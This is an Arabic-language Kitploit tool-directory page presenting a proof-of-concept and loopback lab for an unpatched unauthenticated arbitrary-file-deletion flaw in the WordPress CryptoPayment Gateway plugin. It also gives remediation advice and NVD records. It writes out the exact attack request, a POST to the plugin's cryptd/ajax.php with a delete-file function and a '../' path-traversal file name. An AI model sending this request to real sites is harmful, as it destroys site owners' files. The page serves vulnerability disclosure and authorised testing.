Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/abraxas/cve-2026-81648
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالمحاكاة الافتراضية للأمانأمن الويباختبار الاختراقمختبرات وتدريب عملي
GitHubabraxas/cve-2026-81648

CVE-2026-81648

إثبات مفهوم للاستغلال ومختبر لـ CVE-2026-81648، وهي ثغرة حذف ملفات عشوائية بدون مصادقة في إضافة WordPress CryptoPayment Gateway.

عرض المستودع
منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Abraxas Labs — CVE-2026-81648 — WordPress

abraxaslabs.tech  ·  github.com/abraxas  ·  @abraxas_null  ·  CVE-2026-81648

CVE-2026-81648 — WordPress

WordPress — CryptoPayment Gateway 1.2.2 — Granwill

إن إضافة CryptoPayment Gateway لـ WordPress من الإصدار 1.2.1 إلى 1.2.2 لا تطبّق فحصًا للتفويض على أحد نقاط نهاية AJAX الخاصة بها، مما يسمح للمستخدمين غير المصادق عليهم باستدعاء عمليات إدارية، بما في ذلك حذف ملفات عشوائية على الخادم، والكتابة فوق إعدادات بوابة الدفع، واستعادة بيانات اعتماد المحفظة المخزّنة بنص صريح.

CVECVE-2026-81648 · CVE.org
CWECWE-862
CVSSحرج: 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
المنتجWordPress — CryptoPayment Gateway
المتأثر1.2.1–1.2.2
المرقّعلا يوجد تصحيح عام (WPScan: لا إصلاح معروف)
المصادقةلا شيء (انظر خريطة المصدر)
الترخيصGNU Affero GPL v3.0
المختبر127.0.0.1 فقط · حزمة إفصاح للمورّد/العميل، وليست ماسحًا ضوئيًا

الإشعار (من خريطة المصدر)

delete-file على cryptd/ajax.php هو نقطة الوصول النهائية. HTTP هو ملف PHP ذلك، وليس admin-ajax.php.


المدخل

  • الطريقة: POST
  • المسار: /wp-content/plugins/cryptopayment-gateway/vendor/cryptd/ajax.php
  • الموجّه: POST مباشر إلى vendor/cryptd/ajax.php function=delete-file. ليس wp_ajax. المسار هو DIR/uploads/ + folder + file_name (خمس .. من uploads تصل إلى wp-content).
  • ملاحظات: CVE-2026-81648 CWE-862 CryptoPayment Gateway 1.2.2. الشاهد POCWitness81648 يختفي. لا يوجد تصحيح معروف من المورّد (WPScan). لا تستعد مفاتيح المحفظة.

سلسلة الاستدعاء

  • GET /wp-content/poc81648/index.php expect POCWitness81648
  • POST ajax.php data={"function":"delete-file","file_name":"../../../../../poc81648/index.php","folder":""}
  • crpay_file_delete unlinks wp-content/poc81648/index.php
  • GET witness URL no POCWitness81648

الشروط المسبقة للمختبر

  • CryptoPayment Gateway 1.2.2
  • wp-content/poc81648/index.php يعرض POCWitness81648

الشاهد

POCWitness81648 موجود قبل POST، وغائب بعده. نجاح JSON بدون الحذف ليس هو المقصود.

ليس نجاحًا

  • JSON من ajax دون اختفاء الملف
  • لا يزال يقدّم POCWitness81648
  • حذف wp-config.php
  • استخراج مفاتيح المحفظة
  • reverse shell

التصحيح / المعالجة

افعل هذا أولًا: لا يوجد تصحيح عام. عطّل CryptoPayment Gateway أو احجب vendor/cryptd/ajax.php حتى يتوفر إصدار من المورّد.

تحقّق بعد الترقية

  • أعد تشغيل CVE-2026-81648-Abraxas-Labs.py مقابل البناء المرقّع: يجب ألا يظهر الشاهد المُعيَّن.
  • أكّد إشعار المورّد / مجموعة التغييرات في الشجرة المنشورة (انظر المراجع).
  • توقيع WAF هو تأخير، وليس تصحيحًا.

إذا لم تستطع التحديث فورًا

  • عطّل أو اعزل المكوّن المتأثر.
  • ابحث عن حالة الشاهد في بيئة الإنتاج (مستخدمون مميزون جدد، ملفات غير متوقعة، صفوف مُدخلة — أيًا كان ما تسميه خريطة هذا CVE).

إعادة الإنتاج (مختبر مصرّح به)

استهدف فقط http://127.0.0.1:8088 (أو عنوان loopback الذي ربطته). لا توجّه هذا السكربت إلى الإنترنت.

root@kitploit:~
python3 CVE-2026-81648-Abraxas-Labs.py

النجاح هو الشاهد المذكور أعلاه في جسم الاستجابة. استجابة HTML عامة بحالة 200 ليست هي المقصود.


صور المختبر

حزمة loopback المستخدمة لإعادة الإنتاج. صور رسمية ما لم يبنِ Dockerfile في هذا المجلد من المصدر.

  • lab/docker-compose.yml
  • lab/docker-compose.override.yml
  • lab/Dockerfile
root@kitploit:~
cd lab
docker compose up --force-recreate

اربط شجرة المنتج المتأثر بجوار Compose إذا كان ملف YAML يثبّت مجلدًا محليًا (ملف zip للإضافة / وسم المصدر من جدول الإصدارات). لا تنشر شيئًا عدا 127.0.0.1.


المراجع

  • CVE-2026-81648 · NVD

  • CVE-2026-81648 · CVE.org

  • wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/

  • github.com/advisories/GHSA-9r3q-6qw8-8pm7

  • nvd.nist.gov/vuln/detail/CVE-2026-81648

  • wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898

  • دليل الإضافات: cryptopayment-gateway

  • متصفح Trac: plugins.trac.wordpress.org/cryptopayment-gateway

  • وسوم SVN: plugins.svn.wordpress.org/cryptopayment-gateway

  • Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null


السجلات (منظمة)

root@kitploit:~
# CVE-2026-81648  (structured records)

- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-81648`
- CWE: CWE-862
- published: 2026-09-13T21:17:01.930

## NVD description

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

## MITRE description

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

## Affected

- Unknown CryptoPayment Gateway 1.2.1 affected

## References (JSON sources only)

- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/
- https://github.com/advisories/GHSA-9r3q-6qw8-8pm7
- https://nvd.nist.gov/vuln/detail/CVE-2026-81648
- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898

## GitHub advisory

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization...

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

الترخيص

حزمة الإفصاح هذه مرخّصة بموجب GNU Affero General Public License v3.0. انظر LICENSE.


إخلاء المسؤولية

هذه الحزمة مخصّصة للمورّد، ومالك الموقع، والمختبرات المرخّصة. يتواصل السكربت مع 127.0.0.1. استخدامه ضد أنظمة لا تملكها غير مصرّح به من Abraxas Labs. لا ضمان.

abraxaslabs.tech · github.com/abraxas · @abraxas_null

تنزيل الأداة